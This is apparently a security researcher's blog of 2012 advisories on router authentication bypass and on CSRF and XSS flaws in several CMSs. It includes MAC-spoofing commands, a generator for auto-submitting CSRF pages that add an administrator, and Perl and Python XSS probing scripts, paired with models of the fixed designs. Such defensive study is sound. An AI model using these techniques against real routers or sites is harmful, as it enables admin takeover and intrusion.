D-Link DSL-2640B Authentication Bypass

This router allows an attacker to bypass authentication and log in with administrator ("admin") privileges. While the administrator is logged in, an internal attacker who connects to the web management interface (by default http://192.168.1.1:80) can see the MAC address of the logged-in admin on the router's pages. Since the router treats that MAC address as proof of the admin session, the attacker only has to change his own MAC address to the one displayed to bypass authentication and log in as administrator.

For more details:

http://www.exploit-db.com/exploits/18511/
http://packetstormsecurity.org/files/110117/D-Link-DSL-2640B-Authentication-Bypass.html
http://www.securityfocus.com/bid/52129
http://xforce.iss.net/xforce/xfdb/73379
http://osvdb.org/79617
http://1337day.com/exploit/17562
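The flaw described above is a design mistake: the router binds the admin session to a client-controlled, publicly visible identifier (the MAC address) instead of to a secret. The following model, added here as an illustration and not taken from the DSL-2640B firmware or the linked exploit, shows a MAC-bound authorizer beside a token-bound one. Everything in it (class names, the password "admin", the MAC addresses) is a constructed assumption.

```python
import hmac
import secrets


class MacBoundRouterAuth:
    """Model of the flawed scheme: after a successful login the router only
    remembers the admin's MAC address, exposes it on its status page, and
    treats every later request from that MAC as the admin.
    Constructed model, not the real firmware."""

    def __init__(self, admin_password):
        self._password = admin_password
        self.logged_in_mac = None  # what another LAN host can read off the web UI

    def login(self, client_mac, password):
        if hmac.compare_digest(password, self._password):
            self.logged_in_mac = client_mac
            return True
        return False

    def is_admin(self, client_mac, token=None):
        # Authorization rests entirely on a spoofable, observable value.
        return self.logged_in_mac is not None and client_mac == self.logged_in_mac


class TokenBoundRouterAuth:
    """Hardened model: login hands out an unguessable session token and the
    MAC address is never consulted. Spoofing the MAC gains nothing."""

    def __init__(self, admin_password):
        self._password = admin_password
        self._sessions = set()

    def login(self, client_mac, password):
        if hmac.compare_digest(password, self._password):
            token = secrets.token_hex(16)
            self._sessions.add(token)
            return token
        return None

    def is_admin(self, client_mac, token=None):
        return token is not None and token in self._sessions


def demo():
    """Replays the attack against both models.
    Returns (spoof works on MAC-bound, spoof works on token-bound,
             real admin still works on token-bound)."""
    ADMIN_MAC = "00:11:22:33:44:55"       # constructed
    vuln = MacBoundRouterAuth("admin")
    vuln.login(ADMIN_MAC, "admin")
    leaked_mac = vuln.logged_in_mac        # attacker reads this from the router page
    spoof_vuln = vuln.is_admin(leaked_mac)  # attacker now presents the admin's MAC

    fixed = TokenBoundRouterAuth("admin")
    token = fixed.login(ADMIN_MAC, "admin")
    spoof_fixed = fixed.is_admin(leaked_mac)            # no token: denied
    legit_fixed = fixed.is_admin(ADMIN_MAC, token=token)  # token: allowed
    return spoof_vuln, spoof_fixed, legit_fixed


if __name__ == "__main__":
    print(demo())
```

On a Linux attacker host the real-world counterpart of `leaked_mac` is applied with `ip link set dev eth0 down`, `ip link set dev eth0 address 00:11:22:33:44:55` and `ip link set dev eth0 up` (interface name and MAC are placeholders); the fix on the router side is the second class: a random per-login session token carried in a cookie, never the layer-2 address.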

 

ForkCMS 3.2.5 CSRF and XSS "0day" Vulnerabilities

Today I've discovered multiple vulnerabilities in Fork CMS 3.2.5. I think these vulnerabilities are also present in version 3.2.6.

Other publications related to these vulnerabilities:
http://packetstormsecurity.org/files/110048/ForkCMS-3.2.5-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
http://www.exploit-db.com/exploits/18505/
http://secunia.com/advisories/48067
http://osvdb.org/show/osvdb/79444 
http://xforce.iss.net/xforce/xfdb/73394
http://www.securelist.com/en/advisories/48067
www.1337day.com/exploits/17557

 

Cisco Linksys WAG54GS (ADSL Router) change admin password

Today I found a new "0day" vulnerability in the Cisco Linksys WAG54GS Wi-Fi ADSL router and published a related exploit that changes the default administrator ("admin") password.

To view my Original Advisory:
Cisco Linksys WAG54GS CSRF Original Advisory

Other related publications:
http://osvdb.org/show/osvdb/80809
http://www.exploit-db.com/exploits/18503/
http://packetstormsecurity.org/files/110040/Cisco-Linksys-WAG54GS-Cross-Site-Request-Forgery.html
http://www.securityfocus.com/bid/52105

You can easily modify this exploit to change other router parameters as well.

D-Link DSL-2640B (ADSL Router) CSRF "0day" Vulnerability

I’ve discovered a new “0day” vulnerability:

To view my Original Advisory:
D-Link DSL-2640B CSRF (Change admin Password) Original Advisory

Other related publications:
http://osvdb.org/show/osvdb/80803
http://www.securityfocus.com/bid/52096/info
http://www.exploit-db.com/author/?a=3557
http://packetstormsecurity.org/files/author/9536/

This vulnerability allows an attacker to change the administrator password of the D-Link DSL-2640B ADSL router through a cross-site request forged while the administrator is logged in.

SyndeoCMS <= 3.0 CSRF "0day" Vulnerability

Today I've found a new "0day" vulnerability in SyndeoCMS 3.0 (and lower versions) and I've created an exploit that automatically adds an administrator account when the real administrator browses an "ad hoc" web page containing simple HTML/JavaScript code.

For more details:

http://www.exploit-db.com/author/?a=3557
http://packetstormsecurity.org/files/author/9536/

Some web sites that published my "0day" vulnerability:

http://1337day.com/exploits/17544
http://exploitsdownload.com/exploit/php/syndeocms-30-csrf-vulnerabili
http://www.allinfosec.com/2012/02/19/webapps-0day-syndeocms-3-0-csrf-vulnerability/
http://www.silobreaker.com/webapps–syndeocms-lt-30-csrf-vulnerability-5_2265494154572201984
http://eternal-todo.com/aggregator/categories/1
http://www.morningstarsecurity.com/news
http://unsecure-os.org/index.php/exploits
http://securit.se/it-sakerhetsnyheter/
http://cxsecurity.com/
http://www.bugsearch.net/

SocialCMS CSRF "0day" Vulnerability

Yesterday I found a "0day" vulnerability in the latest version (1.0.2) of the "SocialCMS" CMS (socialcms.com) and created an exploit to add an administrator account. The vulnerability and the related exploit have been published in the Offensive Security Exploit Database. You can find more details here:

http://www.exploit-db.com/author/?a=3557

Other web sites have published this "0day" vulnerability:

http://www.allinfosec.com/2012/02/16/webapps-0day-socialcms-csrf-vulnerability
http://www.1337day.com/exploits/17527
http://www.realhacker.net/tag/webapps
http://94hi.com/exploit/html/3244.html
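The four CSRF posts above (Cisco Linksys WAG54GS and D-Link DSL-2640B password change, SyndeoCMS and SocialCMS admin-account creation) all rely on the same mechanism: the victim's browser attaches the admin's session cookie to a request that a hostile page submitted, and the application accepts it because it checks nothing but that cookie. The following code is an added illustration, not any of the published exploits or the affected products' code: it generates the kind of self-submitting HTML page the posts mention and models a vulnerable "add admin" handler beside one protected by a per-session anti-CSRF token. The endpoint URL and the field names `new_admin` / `csrf_token` are assumptions, not the real products' parameters.

```python
import html
import hmac
import secrets


def build_csrf_page(action_url, fields):
    """Attacker's page: a hidden POST form submitted on load. The victim's
    browser adds the target's cookies on its own; that is the whole trick.
    action_url and fields are whatever the target's form expects (assumed)."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{html.escape(action_url)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>\n"
    )


class AdminPanel:
    """Constructed model of a CMS/router admin panel with cookie sessions.
    add_admin_vulnerable trusts the cookie alone; add_admin_fixed also
    requires a token that only same-origin pages can read."""

    def __init__(self):
        self.sessions = {}      # session cookie -> (username, csrf_token)
        self.admins = {"admin"}

    def login(self, username):
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = (username, secrets.token_hex(16))
        return cookie

    def csrf_token_for(self, cookie):
        """What the legitimate admin page embeds in its own forms."""
        return self.sessions[cookie][1]

    def add_admin_vulnerable(self, request):
        user, _ = self.sessions.get(request.get("cookie"), (None, None))
        if user not in self.admins:
            return 403
        self.admins.add(request["form"]["new_admin"])   # any origin can trigger this
        return 200

    def add_admin_fixed(self, request):
        user, expected = self.sessions.get(request.get("cookie"), (None, None))
        if user not in self.admins:
            return 403
        supplied = request["form"].get("csrf_token", "")
        if not hmac.compare_digest(supplied, expected):
            return 403   # cross-site form cannot know the session's token
        self.admins.add(request["form"]["new_admin"])
        return 200


def demo():
    """Returns (attacker page, vulnerable status, fixed status,
    legitimate status on fixed handler, resulting admin list)."""
    panel = AdminPanel()
    victim_cookie = panel.login("admin")          # admin is logged in
    page = build_csrf_page("http://target.example/admin/add_user",  # assumed URL
                           {"new_admin": "evil"})
    # The browser turns the attacker's form into this request, cookie included.
    forged = {"cookie": victim_cookie, "form": {"new_admin": "evil"}}
    vuln_status = panel.add_admin_vulnerable(forged)
    fixed_status = panel.add_admin_fixed(forged)
    legit = {"cookie": victim_cookie,
             "form": {"new_admin": "bob",
                      "csrf_token": panel.csrf_token_for(victim_cookie)}}
    legit_status = panel.add_admin_fixed(legit)
    return page, vuln_status, fixed_status, legit_status, sorted(panel.admins)


if __name__ == "__main__":
    page, *statuses, admins = demo()
    print(page)
    print(statuses, admins)
```

The same page template, with the action URL and hidden fields swapped for the ones the target's own form uses, is what changes a router's admin password or creates a CMS administrator in the posts above; the defence is the token comparison in `add_admin_fixed` (or an equivalent Origin/Referer check), which the forged request cannot satisfy.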

Discovering Cross Site Scripting (XSS) vulnerabilities

Today I wrote a simple Perl script to automatically discover XSS vulnerabilities in a web application.

This script can be improved to make it more suitable for use in a web penetration test.

Here is the code:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

my ($webpage, @webpage, @name, $result);

if (@ARGV < 1) {
    usage();
}

# Get the web page specified on the command line
$webpage = get("http://" . $ARGV[0]);
die "Could not fetch http://$ARGV[0]\n" unless defined $webpage;

# Split the page into an array of lines
@webpage = split(/\n/, $webpage);

# Parse the page to obtain the names of 'input type="text"' fields
# (the tag must sit on a single line and use exactly this attribute order)
foreach (@webpage) {
    if ($_ =~ /input\stype="text"\sname="(\w{1,30})"/) {
        push(@name, $1);
    }
}

# Print the search boxes that were found
if (@name) {
    print "I've found the following search box:\n";
    foreach (@name) {
        print "$_\n";
    }
    print "and I've discovered that:\n";

    # Submit the payload through each field as a GET parameter on the same URL
    # and report the field as vulnerable if the payload comes back verbatim
    # (an HTML-escaped reflection is reported as not vulnerable)
    foreach (@name) {
        $result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>");
        if (defined $result && $result =~ /<script>alert\('test_XSS'\)<\/script>/) {
            print "$_ is vulnerable to XSS\n";
        }
        else {
            print "$_ isn't vulnerable to XSS\n";
        }
    }
}
else {
    print "I have not found search boxes in " . $ARGV[0] . "\n";
}

sub usage {
    print "Usage: " . $0 . " <url>\n";
    print "Example: " . $0 . " ivanobinetti.com\n";
    exit;
}
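One way to take the improvement hinted at above further, written here as an added example and not as part of the original script: parse the form with a real HTML parser (catching `<input>` tags without a `type`, which default to text), use a unique random canary per parameter so a reflection can be attributed to the field that produced it, URL-encode the probe properly, and distinguish a raw reflection (exploitable) from an HTML-escaped one (safe). The `fetch` callable is injected so the logic runs offline against the constructed fake site at the bottom; the host `target.example` and the field names `q`, `s`, `zip`, `pw` are made up for the demonstration.

```python
import html
import secrets
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


class _InputCollector(HTMLParser):
    """Collects the name= of every text/search input, including <input>
    tags with no type attribute (the HTML default is text)."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("type", "text").lower() in ("text", "search") and a.get("name"):
            self.names.append(a["name"])


def text_input_names(page_html):
    parser = _InputCollector()
    parser.feed(page_html)
    return parser.names


def reflection_kind(body, canary):
    """'raw'     : canary tag reflected intact -> injectable markup
       'escaped' : reflected as &lt;...&gt;    -> output encoding in place
       'none'    : not reflected at all"""
    if canary in body:
        return "raw"
    if html.escape(canary) in body:
        return "escaped"
    return "none"


def probe_xss(fetch, url, page_html=None):
    """fetch(url) -> response body as str (real HTTP client or a stub).
    Returns {parameter_name: reflection kind} for every text input on the page.
    Each parameter gets its own random canary so reflections are attributable."""
    if page_html is None:
        page_html = fetch(url)
    results = {}
    parts = urlsplit(url)
    for name in text_input_names(page_html):
        canary = f"<xss{secrets.token_hex(4)}>"
        query = dict(parse_qsl(parts.query))
        query[name] = canary                        # urlencode handles < > etc.
        target = urlunsplit(parts._replace(query=urlencode(query)))
        results[name] = reflection_kind(fetch(target), canary)
    return results


def constructed_fake_site(url):
    """Stand-in for a target, constructed for this example: 'q' is echoed
    unescaped (vulnerable), 's' is echoed escaped (safe), 'zip' is never
    echoed, and 'pw' is a password field that should not be probed."""
    qs = dict(parse_qsl(urlsplit(url).query))
    return (
        '<form action="/search">'
        '<input type="text" name="q"><input name="s">'
        '<input type="TEXT" name="zip"><input type="password" name="pw">'
        "</form>"
        f"<p>You searched for {qs.get('q', '')}</p>"
        f"<p>{html.escape(qs.get('s', ''))}</p>"
    )


if __name__ == "__main__":
    for field, kind in probe_xss(constructed_fake_site, "http://target.example/search").items():
        print(f"{field}: {kind}")
```

Against a live target, `fetch` would be a small wrapper around `urllib.request.urlopen` that returns the decoded body; a result of `raw` is the same condition the Perl script reports as vulnerable, while `escaped` tells you the parameter is reflected but encoded, which the original script silently lumps in with "not vulnerable".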